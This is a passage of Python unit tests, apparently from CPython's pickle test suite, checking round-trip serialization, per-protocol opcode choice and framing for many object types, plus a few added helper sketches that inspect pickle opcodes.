def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assert_is_copy(t, t2)
def test_bytes(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i, i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
def test_bytearray(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps(b, proto)
bb = self.loads(p)
self.assertIsNot(bb, b)
self.assert_is_copy(b, bb)
if proto <= 3:
# bytearray is serialized using a global reference
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.GLOBAL, p))
elif proto == 4:
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.STACK_GLOBAL, p))
elif proto == 5:
self.assertNotIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.BYTEARRAY8, p))
def test_ints(self):
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assert_is_copy(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
# assert_is_copy is very expensive here as it precomputes
# a failure message by computing the repr() of n and got,
            # so we just do the check ourselves.
self.assertIs(type(got), int)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assert_is_copy(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
# make sure that floats are formatted locale independent with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
for proto in protocols:
inst = AAA()
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, REDUCE_A)
def test_getinitargs(self):
for proto in protocols:
inst = initarg(1, 2)
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assert_is_copy(inst, loaded)
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_dynamic_class(self):
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
def test_ellipsis(self):
for proto in protocols:
s = self.dumps(..., proto)
u = self.loads(s)
self.assertIs(..., u)
def test_notimplemented(self):
for proto in protocols:
s = self.dumps(NotImplemented, proto)
u = self.loads(s)
self.assertIs(NotImplemented, u)
def test_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
for proto in protocols:
s = self.dumps(type(singleton), proto)
u = self.loads(s)
self.assertIs(type(singleton), u)
# Tests for protocol 2
def test_proto(self):
for proto in protocols:
pickled = self.dumps(None, proto)
if proto >= 2:
proto_header = pickle.PROTO + bytes([proto])
self.assertTrue(pickled.startswith(proto_header))
else:
self.assertEqual(count_opcode(pickle.PROTO, pickled), 0)
oob = protocols[-1] + 1 # a future protocol
build_none = pickle.NONE + pickle.STOP
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as err:
self.assertIn("unsupported pickle protocol", str(err))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
expected = expected_opcode[min(proto, 3), len(x)]
self.assertTrue(opcode_in_pickle(expected, s))
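    # Illustrative sketch (not part of the original suite): the opcode picked
    # for a 2-tuple under protocol 2 can also be inspected directly with
    # pickletools; this uses the top-level pickle module, not self.dumps.
    @staticmethod
    def _demo_tuple2_opcode():
        import pickle
        import pickletools
        data = pickle.dumps((1, 2), protocol=2)
        names = [op.name for op, _, _ in pickletools.genops(data)]
        assert 'TUPLE2' in names  # protocol 2 has a dedicated 2-tuple opcode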
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[min(proto, 3), x]
self.assertTrue(opcode_in_pickle(expected, s))
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assert_is_copy(x, y) # XXX revisit
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_proxies(self):
# NEWOBJ should use the __class__ rather than the raw type
classes = myclasses[:]
# Cannot create weakproxies to these classes
for c in (MyInt, MyTuple):
classes.remove(c)
for proto in protocols:
for C in classes:
B = C.__base__
x = C(C.sample)
x.foo = 42
p = weakref.proxy(x)
s = self.dumps(p, proto)
y = self.loads(s)
self.assertEqual(type(y), type(x)) # rather than type(p)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_not_class(self):
# Issue 24552
global SimpleNewObj
save = SimpleNewObj
o = SimpleNewObj.__new__(SimpleNewObj)
b = self.dumps(o, 4)
try:
SimpleNewObj = 42
self.assertRaises((TypeError, pickle.UnpicklingError), self.loads, b)
finally:
SimpleNewObj = save
# Register a type with copyreg, with extension code extcode. Pickle
# an object of that type. Check that the resulting pickle uses opcode
# (EXT[124]) under proto 2, and not in proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertIn(__name__.encode("utf-8"), s1)
self.assertIn(b"MyList", s1)
self.assertFalse(opcode_in_pickle(opcode, s1))
y = self.loads(s1)
self.assert_is_copy(x, y)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertNotIn(__name__.encode("utf-8"), s2)
self.assertNotIn(b"MyList", s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assert_is_copy(x, y)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
self.assertIsInstance(s, bytes_types)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_set_chunking(self):
n = 10 # too small to chunk
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertEqual(num_additems, 1)
n = 2500 # expect at least two chunks when proto >= 4
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertGreaterEqual(num_additems, 2)
def test_simple_newobj(self):
x = SimpleNewObj.__new__(SimpleNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
else:
self.assertIn(b'M\xce\xfa', s) # BININT2
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj(self):
x = ComplexNewObj.__new__(ComplexNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj_ex(self):
x = ComplexNewObjEx.__new__(ComplexNewObjEx, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ, s))
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ_EX, s),
4 <= proto)
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
@no_tracing
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
def test_bad_getattr(self):
# Issue #3514: crash when there is an infinite loop in __getattr__
x = BadGetattr()
for proto in protocols:
self.assertRaises(RuntimeError, self.dumps, x, proto)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
        # The Python implementation is less strict and also accepts iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except pickle.PicklingError:
pass
try:
self.dumps(D(), proto)
except pickle.PicklingError:
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
with self.subTest(proto=proto):
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assert_is_copy(obj, loaded)
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA_XRANGE)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA_SET2)
def test_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
for proto in protocols:
data = (1, min, b'xy' * (30 * 1024), len)
dumped = self.dumps(data, proto)
loaded = self.loads(dumped)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_int_pickling_efficiency(self):
        # Test compactness of int representation (see issue #12744)
for proto in protocols:
with self.subTest(proto=proto):
pickles = [self.dumps(2**n, proto) for n in range(70)]
sizes = list(map(len, pickles))
# the size function is monotonic
self.assertEqual(sorted(sizes), sizes)
if proto >= 2:
for p in pickles:
self.assertFalse(opcode_in_pickle(pickle.LONG, p))
def _check_pickling_with_opcode(self, obj, opcode, proto):
pickled = self.dumps(obj, proto)
self.assertTrue(opcode_in_pickle(opcode, pickled))
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
def test_appends_on_non_lists(self):
# Issue #17720
obj = REX_six([1, 2, 3])
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.APPEND, proto)
else:
self._check_pickling_with_opcode(obj, pickle.APPENDS, proto)
def test_setitems_on_non_dicts(self):
obj = REX_seven({1: -1, 2: -2, 3: -3})
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.SETITEM, proto)
else:
self._check_pickling_with_opcode(obj, pickle.SETITEMS, proto)
# Exercise framing (proto >= 4) for significant workloads
FRAME_SIZE_MIN = 4
FRAME_SIZE_TARGET = 64 * 1024
def check_frame_opcodes(self, pickled):
"""
Check the arguments of FRAME opcodes in a protocol 4+ pickle.
Note that binary objects that are larger than FRAME_SIZE_TARGET are not
framed by default and are therefore considered a frame by themselves in
the following consistency check.
"""
frame_end = frameless_start = None
frameless_opcodes = {'BINBYTES', 'BINUNICODE', 'BINBYTES8',
'BINUNICODE8', 'BYTEARRAY8'}
for op, arg, pos in pickletools.genops(pickled):
if frame_end is not None:
self.assertLessEqual(pos, frame_end)
if pos == frame_end:
frame_end = None
if frame_end is not None: # framed
self.assertNotEqual(op.name, 'FRAME')
if op.name in frameless_opcodes:
# Only short bytes and str objects should be written
# in a frame
self.assertLessEqual(len(arg), self.FRAME_SIZE_TARGET)
else: # not framed
if (op.name == 'FRAME' or
(op.name in frameless_opcodes and
len(arg) > self.FRAME_SIZE_TARGET)):
# Frame or large bytes or str object
if frameless_start is not None:
# Only short data should be written outside of a frame
self.assertLess(pos - frameless_start,
self.FRAME_SIZE_MIN)
frameless_start = None
elif frameless_start is None and op.name != 'PROTO':
frameless_start = pos
if op.name == 'FRAME':
self.assertGreaterEqual(arg, self.FRAME_SIZE_MIN)
frame_end = pos + 9 + arg
pos = len(pickled)
if frame_end is not None:
self.assertEqual(frame_end, pos)
elif frameless_start is not None:
self.assertLess(pos - frameless_start, self.FRAME_SIZE_MIN)
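    # Illustrative sketch (not part of the original suite): FRAME opcodes can
    # be counted with pickletools to observe the ~64 KiB framing that
    # check_frame_opcodes verifies above; uses the top-level pickle module.
    @staticmethod
    def _demo_count_frames():
        import pickle
        import pickletools
        data = pickle.dumps(list(range(100000)), protocol=4)
        n_frames = sum(1 for op, _, _ in pickletools.genops(data)
                       if op.name == 'FRAME')
        return n_frames  # several frames of roughly FRAME_SIZE_TARGET bytes each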
@support.skip_if_pgo_task
def test_framing_many_objects(self):
obj = list(range(10**5))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
pickled = self.dumps(obj, proto)
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
bytes_per_frame = (len(pickled) /
count_opcode(pickle.FRAME, pickled))
self.assertGreater(bytes_per_frame,
self.FRAME_SIZE_TARGET / 2)
self.assertLessEqual(bytes_per_frame,
self.FRAME_SIZE_TARGET * 1)
self.check_frame_opcodes(pickled)
def test_framing_large_objects(self):
N = 1024 * 1024
small_items = [[i] for i in range(10)]
obj = [b'x' * N, *small_items, b'y' * N, 'z' * N]
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for fast in [False, True]:
with self.subTest(proto=proto, fast=fast):
if not fast:
# fast=False by default.
# This covers in-memory pickling with pickle.dumps().
pickled = self.dumps(obj, proto)
else:
# Pickler is required when fast=True.
if not hasattr(self, 'pickler'):
continue
buf = io.BytesIO()
pickler = self.pickler(buf, protocol=proto)
pickler.fast = fast
pickler.dump(obj)
pickled = buf.getvalue()
unpickled = self.loads(pickled)
# More informative error message in case of failure.
self.assertEqual([len(x) for x in obj],
[len(x) for x in unpickled])
# Perform full equality check if the lengths match.
self.assertEqual(obj, unpickled)
n_frames = count_opcode(pickle.FRAME, pickled)
                    # A single frame for the small objects between the
                    # first two large objects.
self.assertEqual(n_frames, 1)
self.check_frame_opcodes(pickled)
def test_optional_frames(self):
if pickle.HIGHEST_PROTOCOL < 4:
return
def remove_frames(pickled, keep_frame=None):
"""Remove frame opcodes from the given pickle."""
frame_starts = []
# 1 byte for the opcode and 8 for the argument
frame_opcode_size = 9
for opcode, _, pos in pickletools.genops(pickled):
if opcode.name == 'FRAME':
frame_starts.append(pos)
newpickle = bytearray()
last_frame_end = 0
for i, pos in enumerate(frame_starts):
if keep_frame and keep_frame(i):
continue
newpickle += pickled[last_frame_end:pos]
last_frame_end = pos + frame_opcode_size
newpickle += pickled[last_frame_end:]
return newpickle
frame_size = self.FRAME_SIZE_TARGET
num_frames = 20
        # Large byte objects (dict values) interleaved with small objects
        # (dict keys)
for bytes_type in (bytes, bytearray):
obj = {i: bytes_type([i]) * frame_size for i in range(num_frames)}
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
pickled = self.dumps(obj, proto)
frameless_pickle = remove_frames(pickled)
self.assertEqual(count_opcode(pickle.FRAME, frameless_pickle), 0)
self.assertEqual(obj, self.loads(frameless_pickle))
some_frames_pickle = remove_frames(pickled, lambda i: i % 2)
self.assertLess(count_opcode(pickle.FRAME, some_frames_pickle),
count_opcode(pickle.FRAME, pickled))
self.assertEqual(obj, self.loads(some_frames_pickle))
@support.skip_if_pgo_task
def test_framed_write_sizes_with_delayed_writer(self):
class ChunkAccumulator:
"""Accumulate pickler output in a list of raw chunks."""
def __init__(self):
self.chunks = []
def write(self, chunk):
self.chunks.append(chunk)
def concatenate_chunks(self):
return b"".join(self.chunks)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
objects = [(str(i).encode('ascii'), i % 42, {'i': str(i)})
for i in range(int(1e4))]
# Add a large unique ASCII string
objects.append('0123456789abcdef' *
(self.FRAME_SIZE_TARGET // 16 + 1))
# Protocol 4 packs groups of small objects into frames and issues
# calls to write only once or twice per frame:
# The C pickler issues one call to write per-frame (header and
# contents) while Python pickler issues two calls to write: one for
# the frame header and one for the frame binary contents.
writer = ChunkAccumulator()
self.pickler(writer, proto).dump(objects)
# Actually read the binary content of the chunks after the end
# of the call to dump: any memoryview passed to write should not
            # be released; otherwise this delayed access would not be possible.
pickled = writer.concatenate_chunks()
reconstructed = self.loads(pickled)
self.assertEqual(reconstructed, objects)
self.assertGreater(len(writer.chunks), 1)
# memoryviews should own the memory.
del objects
support.gc_collect()
self.assertEqual(writer.concatenate_chunks(), pickled)
n_frames = (len(pickled) - 1) // self.FRAME_SIZE_TARGET + 1
# There should be at least one call to write per frame
self.assertGreaterEqual(len(writer.chunks), n_frames)
# but not too many either: there can be one for the proto,
# one per-frame header, one per frame for the actual contents,
# and two for the header.
self.assertLessEqual(len(writer.chunks), 2 * n_frames + 3)
chunk_sizes = [len(c) for c in writer.chunks]
large_sizes = [s for s in chunk_sizes
if s >= self.FRAME_SIZE_TARGET]
medium_sizes = [s for s in chunk_sizes
if 9 < s < self.FRAME_SIZE_TARGET]
small_sizes = [s for s in chunk_sizes if s <= 9]
# Large chunks should not be too large:
for chunk_size in large_sizes:
self.assertLess(chunk_size, 2 * self.FRAME_SIZE_TARGET,
chunk_sizes)
            # There shouldn't be too many small chunks: the protocol header,
# the frame headers and the large string headers are written
# in small chunks.
self.assertLessEqual(len(small_sizes),
len(large_sizes) + len(medium_sizes) + 3,
chunk_sizes)
def test_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(proto=proto, obj=obj):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIs(obj, unpickled)
def test_recursive_nested_names(self):
global Recursive
class Recursive:
pass
Recursive.mod = sys.modules[Recursive.__module__]
Recursive.__qualname__ = 'Recursive.mod.Recursive'
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
unpickled = self.loads(self.dumps(Recursive, proto))
self.assertIs(unpickled, Recursive)
del Recursive.mod # break reference loop
def test_py_methods(self):
global PyMethodsTest
class PyMethodsTest:
@staticmethod
def cheese():
return "cheese"
@classmethod
def wine(cls):
assert cls is PyMethodsTest
return "wine"
def biscuits(self):
assert isinstance(self, PyMethodsTest)
return "biscuits"
class Nested:
"Nested class"
@staticmethod
def ketchup():
return "ketchup"
@classmethod
def maple(cls):
assert cls is PyMethodsTest.Nested
return "maple"
def pie(self):
assert isinstance(self, PyMethodsTest.Nested)
return "pie"
py_methods = (
PyMethodsTest.cheese,
PyMethodsTest.wine,
PyMethodsTest().biscuits,
PyMethodsTest.Nested.ketchup,
PyMethodsTest.Nested.maple,
PyMethodsTest.Nested().pie
)
py_unbound_methods = (
(PyMethodsTest.biscuits, PyMethodsTest),
(PyMethodsTest.Nested.pie, PyMethodsTest.Nested)
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method in py_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(), unpickled())
for method, cls in py_unbound_methods:
obj = cls()
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(obj), unpickled(obj))
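    # Illustrative sketch (not part of the original suite): methods are
    # pickled by module and qualified name, which is why the nested-class
    # methods above round-trip; uses the top-level pickle module.
    @staticmethod
    def _demo_method_pickling():
        import pickle
        unpickled = pickle.loads(pickle.dumps(str.upper, 4))
        assert unpickled("abc") == "ABC"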
def test_c_methods(self):
global Subclass
class Subclass(tuple):
class Nested(str):
pass
c_methods = (
# bound built-in method
("abcd".index, ("c",)),
# unbound built-in method
(str.index, ("abcd", "c")),
# bound "slot" method
([1, 2, 3].__len__, ()),
# unbound "slot" method
(list.__len__, ([1, 2, 3],)),
# bound "coexist" method
({1, 2}.__contains__, (2,)),
# unbound "coexist" method
(set.__contains__, ({1, 2}, 2)),
# built-in class method
(dict.fromkeys, (("a", 1), ("b", 2))),
# built-in static method
(bytearray.maketrans, (b"abc", b"xyz")),
# subclass methods
(Subclass([1,2,2]).count, (2,)),
(Subclass.count, (Subclass([1,2,2]), 2)),
(Subclass.Nested("sweet").count, ("e",)),
(Subclass.Nested.count, (Subclass.Nested("sweet"), "e")),
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method, args in c_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(*args), unpickled(*args))
def test_compat_pickle(self):
tests = [
(range(1, 7), '__builtin__', 'xrange'),
(map(int, '123'), 'itertools', 'imap'),
(functools.reduce, '__builtin__', 'reduce'),
(dbm.whichdb, 'whichdb', 'whichdb'),
(Exception(), 'exceptions', 'Exception'),
(collections.UserDict(), 'UserDict', 'IterableUserDict'),
(collections.UserList(), 'UserList', 'UserList'),
(collections.defaultdict(), 'collections', 'defaultdict'),
]
for val, mod, name in tests:
for proto in range(3):
with self.subTest(type=type(val), proto=proto):
pickled = self.dumps(val, proto)
self.assertIn(('c%s\n%s' % (mod, name)).encode(), pickled)
self.assertIs(type(self.loads(pickled)), type(val))
def test_local_lookup_error(self):
        # Test that whichmodule() errors out cleanly when the lookup of
        # an assumed globally-reachable object fails.
def f():
pass
# Since the function is local, lookup will fail
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Same without a __module__ attribute (exercises a different path
# in _pickle.c).
del f.__module__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Yet a different path.
f.__name__ = f.__qualname__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
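    # Illustrative sketch (not part of the original suite): objects that are
    # not reachable as module-level globals (such as a lambda) cannot be
    # pickled, which is the failure mode test_local_lookup_error checks.
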